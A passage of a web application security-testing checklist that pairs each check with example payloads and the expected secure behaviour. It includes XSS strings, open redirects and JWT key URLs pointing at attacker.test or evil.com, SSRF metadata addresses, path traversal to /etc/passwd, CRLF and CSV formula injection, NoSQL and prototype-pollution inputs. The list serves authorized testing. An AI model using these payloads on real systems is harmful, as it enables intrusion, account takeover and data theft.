Check whether risky files open inline or forced download. Content-Disposition: inline vs attachment Risky content should be downloaded or served from isolated domain.
Upload/download images/docs and inspect metadata. exiftool file.jpg/file.pdf Sensitive metadata should be stripped if required.
Upload invalid/corrupt files and inspect errors. Broken image/PDF/ZIP No stack traces/internal paths should be exposed.

Client Side Testing

12 checks
Browser/Client-Side Controls12 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Manipulate URL/hash/query parameters and check if JavaScript writes them into dangerous sinks. #<img src=x onerror=alert(1)>
?next=<svg/onload=alert(1)>		 Client should encode/sanitize untrusted data before DOM insertion.
Look for eval/new Function/setTimeout(string)/dynamic script loading using user input. Search JS for eval(, Function(, setTimeout( Untrusted input should not be executed as JavaScript.
Inject harmless HTML into client-rendered fields and check rendering. <h1>Injected</h1><a href=https://attacker.com>Click</a> User input should not render as raw HTML unless safely sanitized.
Modify redirect-like parameters or hash values. ?redirect=https://evil.com
#//evil.com
?returnUrl=//evil.com		 Redirects should only allow trusted internal paths.
Inject style/CSS payloads into style fields or profile/theme parameters. background:url(//attacker.test/x)
position:fixed;top:0;left:0		 User-controlled CSS should be blocked or sanitized.
Tamper JS/CSS/image/API paths controlled by query/config. ?cdn=https://attacker.com/
?script=//attacker.com/a.js		 Client should not load attacker-controlled resources.
Send requests with untrusted Origin and check ACAO/credentials behavior. Origin: https://evil.com Sensitive APIs should not allow untrusted origins, especially with credentials.
Check for legacy Flash/SWF and permissive crossdomain policies. /crossdomain.xml, .swf files Legacy cross-domain access should be removed or restricted.
Try embedding sensitive pages in iframe. <iframe src="https://target/sensitive"></iframe> Sensitive pages should set frame protections.
Inspect WebSocket connect/message flow for auth, origin validation, message tampering, and data leakage. Modify WS message/user_id/action WebSockets should authenticate, authorize, and validate every message.
Inspect postMessage usage for wildcard targetOrigin or missing origin validation. window.postMessage(data, "*") postMessage should validate origin and use exact targetOrigin.
Inspect localStorage/sessionStorage for tokens, PII, secrets, and persistence after logout. authToken, refreshToken, user PII Sensitive tokens/PII should not be stored insecurely in browser storage.

Insecure Design (A04)

4 checks
Design and Abuse Case Testing4 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Try using functionality in unintended ways to gain free access, bypass payment, misuse rewards, or bypass approvals. Apply coupon after payment; access premium content without subscription Design should prevent abuse cases, not only input validation errors.
Check critical flows for missing rate limits, missing re-authentication, missing approval, or missing server-side validation. No rate limit on OTP/coupon/export Security controls should exist at design level for sensitive actions.
Bypass frontend validation and send direct API requests with modified values. Change price/status/role in API Backend should not trust frontend-controlled values.
Force invalid states and interrupted flows to check safe handling. Payment timeout then confirm order; cancel then reuse token Failure states should not create unauthorized access or inconsistent state.

Software & Data Integrity Testing (A08)

5 checks
Integrity and Supply Chain5 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Identify outdated/vulnerable libraries and missing integrity controls. npm audit, Snyk, dependency check Known vulnerable packages should be upgraded or mitigated.
Look for exposed build artifacts, pipeline files, logs, secrets, or deployment configs. .github/workflows, Jenkinsfile, build logs, .npmrc CI/CD secrets and artifacts should not be public.
Decode and tamper JWT claims/header/signature; test alg=none/weak algorithms/expired tokens. jwt.io; change role/user_id/exp; alg=none Server should validate signature, algorithm, issuer, audience, expiry, and claims.
Look for serialized objects in cookies/body/headers/uploads and safely modify low-risk values first. Java rO0AB..., PHP O:4:"User", .NET ViewState, YAML/XML/JSON type fields User-controlled serialized data should not be deserialized unsafely.
Modify downloaded/uploaded files or signed data and check if tampering is detected. Modify signed download URL, checksum, file hash Integrity checks should detect tampering.

Security Logging & Monitoring Testing (A09)

5 checks
Logging, Monitoring and Audit Trail5 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Perform login failures, password reset, privilege changes, admin actions, and check logs if available. failed login, reset request, admin delete Critical security events should be logged.
Verify logs do not contain passwords, OTPs, tokens, session IDs, or PII unnecessarily. password=, token=, otp= Logs should not store secrets or sensitive data.
Inject CRLF/special characters into logged fields and inspect log formatting if accessible. username=test%0aFAKE LOG ENTRY User input should not corrupt or forge log entries.
Simulate brute force, enumeration, and suspicious access attempts to verify alerting process. Repeated failed login/OTP/admin access Suspicious activity should trigger monitoring/alerts.
Verify critical actions record who, what, when, where, and before/after state. Admin change, role update, password reset Audit trail should support investigation without leaking secrets.

SSRF Testing (A10)

6 checks
Server-Side Request Forgery6 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Find functions where server fetches user-supplied URLs. Import by URL, image upload by URL, webhook, PDF generator, link preview URL-fetching features should be tightly allowlisted.
Use controlled callback domain to confirm whether server makes outbound request. Burp Collaborator/ngrok/collaborator-like endpoint Outbound requests should only occur for approved destinations.
Submit internal URLs in authorized test environment. http://127.0.0.1, http://localhost, http://10.0.0.1, http://169.254.169.254 Private/internal/metadata addresses should be blocked.
Try non-HTTP protocols if accepted by parser. file://, ftp://, gopher://, dict:// Only safe protocols should be allowed.
Use external URL that redirects to internal/private IP and check whether final destination is revalidated. https://attacker.test/redirect-to-127.0.0.1 Application should validate final redirected URL.
Check if internal response body/status/timing is exposed to user. Blind/timing/error differences Internal responses should not leak to user.

Additional Advanced Web/API Vulnerabilities

13 checks
Cache, Header, Redirect and Proxy Attacks9 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Find cacheable pages, add unkeyed headers/params, check reflection, then verify if poisoned response is served from cache. X-Forwarded-Host: attacker.com
X-Original-URL: /admin
Check X-Cache/Age/CF-Cache-Status		 Cache should not store attacker-controlled content for other users.
As logged-in user, append fake static extension/path to private dynamic pages and test if cached publicly. /account/profile.css
/api/me/test.png
/orders/123/style.css		 Private user data should never be cached as public static content.
In authorized environments, use safe Burp Smuggler probes to test CL.TE/TE.CL/TE.TE desync. Content-Length + Transfer-Encoding: chunked probes Frontend/backend should parse requests consistently; no desync.
Modify Host and forwarded host headers and check password reset links, redirects, asset URLs, cache, and routing. Host: attacker.com
X-Forwarded-Host: attacker.com
Forwarded: host=attacker.com		 Application should use configured trusted host, not client-controlled headers.
Inject CRLF into inputs reflected in headers such as Location or Set-Cookie. name=test%0d%0aSet-Cookie:evil=1 CRLF should be encoded/rejected; no injected response headers.
Decode and modify client-controlled cookies and replay requests. Cookie: role=user → role=admin
Base64/JSON cookie changes		 Sensitive state should not be trusted from unsigned client-side cookies.
Modify redirect parameters and test external/encoded bypasses. ?redirect=https://evil.com
?returnUrl=//evil.com
https://example.com.evil.com
https://evil.com@example.com		 Only allowlisted internal redirects should be allowed.
Try headers that may be trusted by proxy/backend routing. X-Forwarded-For: 127.0.0.1
X-Original-URL: /admin
X-Rewrite-URL: /internal		 User-supplied headers should not grant internal routing/access.
Inject CRLF into email fields to attempt CC/BCC/Subject/body injection. test@test.com%0aBCC:attacker@test.com
test@test.com%0d%0aSubject:Injected		 Email headers should not be injectable; input should be sanitized.
Deserialization, Race and Prototype Pollution4 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Identify serialized data in cookies, hidden fields, API body, headers, uploads, or ViewState and modify low-risk values first. Java rO0AB..., PHP O:4:"User", JSON {"__type":"UserSession","role":"admin"} Application should not deserialize untrusted data or should verify integrity before processing.
Send parallel requests for one-time/limited actions and verify backend state. Apply coupon 20 times; reset token twice; withdraw twice; OTP verify in parallel Only one valid operation should succeed; state must be atomic.
Inject prototype keys into JSON/query inputs and check unexpected property/behavior changes. {"__proto__":{"polluted":"yes"}}
{"constructor":{"prototype":{"isAdmin":true}}}
?__proto__[polluted]=yes		 Dangerous keys should be rejected and object prototypes should not be polluted.
View page source and JS files; search for tokens, API keys, secrets, internal endpoints, and source maps. View Source, Burp, DevTools Search: apiKey, secret, token, password, bearer Frontend should not contain secrets or sensitive internal implementation details.

Additional Non-API-Top-10 VAPT Coverage Added

0 checks

Additional Data Validation Checks

11 checks
NoSQL Injection3 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Identify inputs used by NoSQL-backed features such as login, search, filters, profile lookup, or document lookup. Replace normal values with NoSQL operators and observe whether authentication, filtering, or authorization changes. {"email":{"$ne":null},"password":{"$ne":null}}
{"username":{"$regex":".*"}}
?user[$ne]=test		 Application should reject operator objects or treat them as plain values; authentication and filters should not be bypassed.
Send safe boolean-style NoSQL payloads and compare response length, result count, status code, and timing. {"name":{"$gt":""}}
{"id":{"$in":["victim_id"]}}		 No different behavior should expose query logic or allow unauthorized records to be returned.
Change expected string/number fields into arrays or objects and check whether validation is bypassed. {"role":["user","admin"]}
{"email":{"value":"a@b.com"}}		 Server should enforce strict schema and reject wrong data types.
Server-Side Template Injection (SSTI)3 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Find inputs rendered in server-generated pages, emails, PDFs, invoices, templates, or notification content. Submit basic template expressions and check whether they are evaluated. {{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}		 Payload should be displayed as text or safely encoded; it should not evaluate to 49.
Submit template expressions in profile name, invoice fields, report titles, email templates, or content generation fields and check generated output. Name: {{7*7}}
Title: ${7*7}		 Generated emails/PDFs/pages should not execute user-controlled template syntax.
Send malformed template syntax and inspect errors for template engine names or stack traces. {{7*}}
${{bad}}		 No template engine details, stack traces, or internal paths should be exposed.
CSV / Formula Injection2 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Enter formula-like payloads in fields that may be exported, such as name, email, comment, ticket title, address, or report data. Export CSV/XLSX and open safely in a controlled environment. =2+2
+cmd|' /C calc'!A0
@SUM(1+1)
-HYPERLINK("http://attacker.test","click")		 Exported data should neutralize formula execution by escaping dangerous leading characters such as =, +, -, @, tab, and CR/LF.
If the app imports CSV and later exports/reports it, upload formula payloads and verify they are sanitized during export/display. CSV cell value: =HYPERLINK("http://attacker.test") Imported formula-like values should not execute when later exported or opened.
Mass Assignment / Overposting3 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Add unauthorized fields to create/update requests and check whether backend accepts them. {"name":"test","role":"admin","isAdmin":true,"isVerified":true,"status":"active"} Server should ignore/reject fields the user is not allowed to set.
Add fields that affect plan, price, wallet, limits, approval, ownership, or verification status. {"plan":"premium","price":0,"balance":99999,"approved":true,"ownerId":"victim"} Client-controlled extra fields should not modify server-side business state.
Inject hidden fields inside nested JSON objects and arrays. {"profile":{"name":"a","role":"admin"},"settings":{"mfaEnabled":false}} Nested unauthorized fields should be rejected or ignored.

Additional Authentication, OAuth, SSO and JWT Checks

20 checks
OAuth / SSO Misconfiguration6 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
During OAuth/SSO login, modify redirect_uri/callback URL and verify whether tokens/codes can be sent to an untrusted domain. redirect_uri=https://attacker.test/callback
redirect_uri=https://trusted.com.attacker.test
redirect_uri=//attacker.test		 Only exact allowlisted redirect URIs should be accepted.
Start OAuth login and check whether state exists, is random, tied to session, and validated. Remove/change/reuse it. Remove state
Reuse old state
Swap state between browsers		 State should be required, unpredictable, session-bound, and single-use to prevent CSRF/login CSRF.
For mobile/SPA/public clients, check whether authorization code flow requires valid code_verifier matching code_challenge. Remove code_verifier
Use wrong code_verifier		 Token exchange should fail without valid PKCE where applicable.
Use the same OAuth authorization code more than once. Replay code exchange request Authorization code should be single-use and short-lived.
Check whether access tokens, ID tokens, or auth codes appear in URL fragments/query parameters and leak to third-party links. Inspect redirect URL, Referer header, analytics/social links Tokens/codes should not leak to third parties or browser history.
If ID tokens are used, modify issuer/audience/expiry/signature and check whether login is accepted. Invalid aud, iss, exp, unsigned/tampered ID token Backend should validate issuer, audience, expiry, nonce, and signature.
Account Linking / Social Login Abuse4 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Try initiating account linking while logged in as one user and complete OAuth with another identity, or reuse linking URLs across sessions. Start link as User A, complete as User B Social accounts should link only after re-authentication and correct session validation.
Check whether the app trusts email from OAuth provider even if email_verified is false or absent. Provider response with email_verified=false Application should not trust unverified provider email for account takeover or auto-linking.
Try logging in with a provider account whose email differs from the existing local account or is controlled by attacker. OAuth email mismatch / changed email at provider App should prevent unsafe auto-linking and require verified ownership.
Combine SSO flow with redirect_uri/open redirect testing and check whether tokens/codes can be captured. redirect_uri through open redirect path OAuth codes/tokens must never be deliverable to attacker-controlled destinations.
Detailed JWT Testing6 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Decode JWT, change header algorithm to none, remove signature, and replay in authorized test environment. {"alg":"none","typ":"JWT"} Unsigned or alg=none tokens should be rejected.
If HS256 is used and allowed by scope, test whether token can be cracked using weak/common secrets. Common secrets: secret, password, jwtsecret JWT signing secret should be strong and not crackable.
Modify claims such as role, user_id, tenant_id, scope, plan, or isAdmin and replay token. {"role":"admin","isAdmin":true,"user_id":"victim"} Any tampered token should fail signature validation or authorization checks.
Replay expired token or remove/change exp claim. exp in past; remove exp claim Expired or malformed tokens should be rejected.
Change iss/aud claims or use token from another environment/app. aud=other-app
iss=attacker		 Backend should validate expected issuer and audience.
Modify JWT header key identifiers/remote key URLs and check whether server fetches or trusts attacker keys. kid=../../key
jku=https://attacker.test/jwks.json
x5u=https://attacker.test/cert.pem		 Server should only use trusted key sources and should not fetch arbitrary attacker-controlled keys.
Rate Limit Bypass Techniques4 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Repeat rate-limited requests while changing spoofable IP headers. X-Forwarded-For: 1.1.1.1
X-Real-IP: 2.2.2.2
Client-IP: 3.3.3.3		 Rate limiting should use trusted proxy configuration and should not be bypassed by user-controlled headers.
Change case, spacing, encoding, plus addressing, or phone number format while attempting rate-limited actions. Test@Mail.com vs test@mail.com
test+1@mail.com
+91 99999 vs 099999		 Rate limit should normalize identifiers consistently.
Use alternate endpoints, API versions, trailing slashes, or mobile endpoints for the same action. /login, /api/login, /api/v1/login, /mobile/login, /login/ Same action should share abuse limits across endpoint variants.
Change User-Agent, device ID, cookies, or create new sessions and repeat the same action. New cookie, new device_id, different User-Agent Critical limits should not be bypassed by trivial client-side identifiers.

Additional API-Connected Feature Checks

23 checks
GraphQL Security5 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Identify /graphql or similar endpoint and verify whether it is intended to be public. /graphql, /api/graphql, /gql GraphQL endpoint should require authentication where needed and expose only intended operations.
Send introspection query and check whether schema, types, queries, mutations, and fields are exposed. { __schema { types { name } } } Introspection should be disabled or restricted in production unless intentionally allowed.
Query sensitive fields not visible in UI or belonging to another user. Query user(id:"victim") { email phone role } Each field/object should enforce authorization, not only top-level query.
Send deeply nested or expensive queries and observe latency/rate limits. Nested friends/followers/orders recursion Depth, complexity, timeout, and rate limits should be enforced.
Send multiple queries/mutations in one batch to bypass rate limits or perform mass actions. [{query:"..."},{query:"..."}] Batching should be limited and authorized per operation.
Advanced CORS Testing5 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Send requests with arbitrary Origin header and check whether it is reflected in Access-Control-Allow-Origin. Origin: https://attacker.test Only trusted origins should be allowed; arbitrary reflection is unsafe.
Send Origin header with cookies/session and check Access-Control-Allow-Credentials behavior. Origin: https://attacker.test
Cookie: session=...		 Credentials should not be allowed for untrusted origins.
Send Origin: null and verify whether sensitive APIs allow it. Origin: null null origin should not be trusted for sensitive APIs.
Try attacker-controlled domains that visually match trusted domains. https://example.com.attacker.test
https://attacker-example.com
https://eviltrusted.com		 CORS allowlist should use strict exact origin matching.
Send OPTIONS preflight and check whether dangerous methods/headers are allowed unnecessarily. Access-Control-Request-Method: DELETE
Access-Control-Request-Headers: Authorization		 Only required methods and headers should be allowed.
Webhook Security4 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
If users can configure webhook URLs, try internal/private URLs and unsupported protocols. http://127.0.0.1
http://169.254.169.254
file:///
gopher://		 Webhook destination should be allowlisted or block private/internal IPs and unsafe protocols.
Send a fake webhook request without signature, with invalid signature, and with modified body. Missing X-Signature
Wrong signature
Body tampering		 Webhook receiver should reject unsigned or tampered requests.
Replay a valid webhook request multiple times. Replay same event_id/signature/timestamp Webhook should use timestamp/event ID/idempotency protection to prevent replay.
Check frontend, logs, API responses, and docs for webhook signing secrets or callback tokens. Search secret, webhook_secret, signing_key Webhook secrets should never be exposed client-side or in logs.
Download / Export Functionality5 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Change file/report/export ID in download URL/API and check whether another user’s file can be accessed. /download?id=1001 → /download?id=1002
/files/{file_id}		 Download authorization should verify object ownership and role.
Modify filename/path parameters to access server files or other directories. file=../../etc/passwd
path=..%2f..%2fconfig		 Download API should not allow traversal or arbitrary file read.
Use filters/pagination/body changes to export more data than visible/authorized. limit=999999
role=all
includeSensitive=true		 Exports should enforce authorization, row limits, and least-data response.
Reuse signed download URLs after expiry/logout/password reset or from another account. Replay S3/CDN signed URL Signed URLs should be short-lived, scoped, and not expose unauthorized data.
Download reports/exports and check for PII, internal IDs, tokens, hidden columns, or debug fields. CSV/XLSX/PDF export review Export should contain only intended and authorized data.
Sensitive Data Exposure in API Responses4 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Compare UI-visible fields with raw API response and identify extra PII/internal/security fields. email, phone, dob, role, isAdmin, internalId, passwordHash, token, debug API should return only fields required by the current user and feature.
Call same endpoint with low/high privilege users and compare response data. GET /api/users/{id} Low-privilege users should not receive admin-only fields.
Trigger errors and inspect response for stack, SQL, internal service names, trace IDs with sensitive context. Malformed JSON, invalid ID, expired token Responses should not expose sensitive debug data.
Verify sensitive API responses are not cached by browser/CDN/proxy and not stored in local/session storage unnecessarily. Cache-Control, localStorage/sessionStorage Sensitive data should not be cached or stored client-side unnecessarily.

Additional Client, Headers and Supply Chain Checks

10 checks
Security Headers Detailed Review6 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
Review CSP header for missing/weak directives and unsafe script sources. Content-Security-Policy
unsafe-inline, unsafe-eval, wildcard *		 CSP should restrict script/style/connect/frame sources and avoid unsafe directives where possible.
Verify X-Frame-Options or CSP frame-ancestors on sensitive pages. X-Frame-Options: DENY/SAMEORIGIN
CSP: frame-ancestors		 Sensitive pages should not be frameable by untrusted sites.
Verify X-Content-Type-Options header and dangerous content rendering behavior. X-Content-Type-Options: nosniff Browser should not sniff and execute uploaded/downloaded content as scripts.
Click external links from sensitive pages and check whether tokens/paths leak in Referer. Referrer-Policy: no-referrer / strict-origin-when-cross-origin Sensitive URLs/tokens should not leak to third parties.
Review whether browser features like camera, microphone, geolocation, clipboard are restricted. Permissions-Policy: camera=(), microphone=(), geolocation=() Unneeded browser capabilities should be disabled.
Verify session cookies include Secure, HttpOnly, SameSite, and narrow Path/Domain. Set-Cookie: session=...; Secure; HttpOnly; SameSite=Lax/Strict Cookies should be protected from theft, cross-site abuse, and overbroad scope.
Dependency / Frontend Script Integrity4 checks
Done Checklist Item What exactly to perform Reference / Example / Payload Expected Secure Behaviour
List all external scripts loaded by the frontend and verify they are trusted, necessary, and not loaded over HTTP. <script src="https://third-party..."> Only trusted HTTPS scripts should be loaded.
For static third-party scripts/styles, verify integrity attribute is used where applicable. <script src="..." integrity="sha384-..." crossorigin="anonymous"> SRI should be used for third-party static assets where feasible.
Review JS bundles, package metadata, source maps, and response headers for vulnerable library versions. jquery, lodash, moment, angular, react versions Outdated/vulnerable frontend dependencies should be upgraded or not exposed.
Review whether app references internal package names, public registries, or build artifacts revealing package names. package.json, yarn.lock, source maps Internal packages and dependency metadata should not enable supply-chain attacks.
No checklist items match your search/filter.